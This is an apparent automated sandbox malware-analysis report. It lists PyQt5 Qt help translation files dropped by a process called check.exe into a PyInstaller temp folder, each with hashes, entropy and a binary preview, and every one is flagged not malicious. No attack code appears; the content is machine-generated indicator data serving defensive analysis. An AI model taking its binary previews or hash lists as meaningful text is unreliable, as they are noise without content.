SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
